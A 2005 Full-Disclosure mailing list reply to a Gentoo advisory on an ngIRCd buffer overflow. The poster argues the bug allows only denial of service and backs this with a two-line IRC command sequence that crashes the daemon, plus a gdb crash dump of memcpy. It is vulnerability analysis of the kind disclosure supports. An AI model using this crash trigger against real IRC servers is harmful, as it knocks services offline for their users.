Re: [Full-Disclosure] [ GLSA 200501-40 ] ngIRCd: Buffer overflow

From: qobaiashi (qobaiashi_at_gmx.net)
Date: 02/02/05

  • Next message: Paul Laudanski: "Windows Security Checklists - 10 Parts"
    To: Thierry Carrez <koon@gentoo.org>
    Date: Wed, 2 Feb 2005 22:15:00 +0100
    
    

    > Severity: High
    > Title: ngIRCd: Buffer overflow
    > Date: January 28, 2005
    > Bugs: #79705
    > ID: 200501-40
    >
    > - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    >
    > Synopsis
    > ========
    >
    > ngIRCd is vulnerable to a buffer overflow that can be used to crash the
    > daemon and possibly execute arbitrary code.

    after a quick check IMHO the bug is not exploitable (except for dos):

    to reproduce the bug do:

    /j #test
    /mode #test +I aaax300here@aaax128here

    and watch it go down in:

    Program received signal SIGSEGV, Segmentation fault.
    0x400c5b8c in memcpy () from /lib/libc.so.6
    (gdb) info all-registers
    eax 0x8067e2c 134643244
    ecx 0xffffad7f -21121
    edx 0x80650ca 134631626
    ebx 0xffffff53 -173
    esp 0xbfffeb24 0xbfffeb24
    ebp 0xbfffeb58 0xbfffeb58
    esi 0x806a29e 134652574
    edi 0x806d000 134664192
    eip 0x400c5b8c 0x400c5b8c

    Dump of assembler code for function memcpy:
    0x400c5b20 <memcpy>: push %edi
    0x400c5b21 <memcpy+1>: push %esi
    0x400c5b22 <memcpy+2>: mov 0xc(%esp,1),%edi
    0x400c5b26 <memcpy+6>: mov 0x10(%esp,1),%esi
    0x400c5b2a <memcpy+10>: mov 0x14(%esp,1),%ecx
    0x400c5b2e <memcpy+14>: mov %edi,%eax
    0x400c5b30 <memcpy+16>: cld
    0x400c5b31 <memcpy+17>: cmp $0x20,%ecx
    0x400c5b34 <memcpy+20>: jbe 0x400c5b8c <memcpy+108>
    0x400c5b36 <memcpy+22>: neg %eax
    0x400c5b38 <memcpy+24>: and $0x3,%eax
    0x400c5b3b <memcpy+27>: sub %eax,%ecx
    0x400c5b3d <memcpy+29>: xchg %eax,%ecx
    0x400c5b3e <memcpy+30>: repz movsb %ds:(%esi),%es:(%edi)
    0x400c5b40 <memcpy+32>: mov %eax,%ecx
    0x400c5b42 <memcpy+34>: sub $0x20,%ecx
    0x400c5b45 <memcpy+37>: js 0x400c5b85 <memcpy+101>
    0x400c5b47 <memcpy+39>: mov (%edi),%eax
    0x400c5b49 <memcpy+41>: mov 0x1c(%edi),%edx
    0x400c5b4c <memcpy+44>: sub $0x20,%ecx
    0x400c5b4f <memcpy+47>: mov (%esi),%eax
    0x400c5b51 <memcpy+49>: mov 0x4(%esi),%edx
    0x400c5b54 <memcpy+52>: mov %eax,(%edi)
    0x400c5b56 <memcpy+54>: mov %edx,0x4(%edi)
    0x400c5b59 <memcpy+57>: mov 0x8(%esi),%eax
    0x400c5b5c <memcpy+60>: mov 0xc(%esi),%edx
    0x400c5b5f <memcpy+63>: mov %eax,0x8(%edi)
    0x400c5b62 <memcpy+66>: mov %edx,0xc(%edi)
    0x400c5b65 <memcpy+69>: mov 0x10(%esi),%eax
    0x400c5b68 <memcpy+72>: mov 0x14(%esi),%edx
    0x400c5b6b <memcpy+75>: mov %eax,0x10(%edi)
    0x400c5b6e <memcpy+78>: mov %edx,0x14(%edi)
    0x400c5b71 <memcpy+81>: mov 0x18(%esi),%eax
    0x400c5b74 <memcpy+84>: mov 0x1c(%esi),%edx
    0x400c5b77 <memcpy+87>: mov %eax,0x18(%edi)
    0x400c5b7a <memcpy+90>: mov %edx,0x1c(%edi)
    0x400c5b7d <memcpy+93>: lea 0x20(%esi),%esi
    0x400c5b80 <memcpy+96>: lea 0x20(%edi),%edi
    0x400c5b83 <memcpy+99>: jns 0x400c5b49 <memcpy+41>
    0x400c5b85 <memcpy+101>: add $0x20,%ecx
    0x400c5b88 <memcpy+104>: mov 0xc(%esp,1),%eax
    0x400c5b8c <memcpy+108>: repz movsb %ds:(%esi),%es:(%edi)
    0x400c5b8e <memcpy+110>: pop %esi
    0x400c5b8f <memcpy+111>: pop %edi
    0x400c5b90 <memcpy+112>: ret
    0x400c5b91 <memcpy+113>: nop
    0x400c5b92 <memcpy+114>: nop
    0x400c5b93 <memcpy+115>: nop
    0x400c5b94 <memcpy+116>: nop
    0x400c5b95 <memcpy+117>: nop
    0x400c5b96 <memcpy+118>: nop
    0x400c5b97 <memcpy+119>: nop
    0x400c5b98 <memcpy+120>: nop
    0x400c5b99 <memcpy+121>: nop
    0x400c5b9a <memcpy+122>: nop
    0x400c5b9b <memcpy+123>: nop
    0x400c5b9c <memcpy+124>: nop
    0x400c5b9d <memcpy+125>: nop
    0x400c5b9e <memcpy+126>: nop
    0x400c5b9f <memcpy+127>: nop
    End of assembler dump.
    (gdb)

    yours
    -q


  • Next message: Paul Laudanski: "Windows Security Checklists - 10 Parts"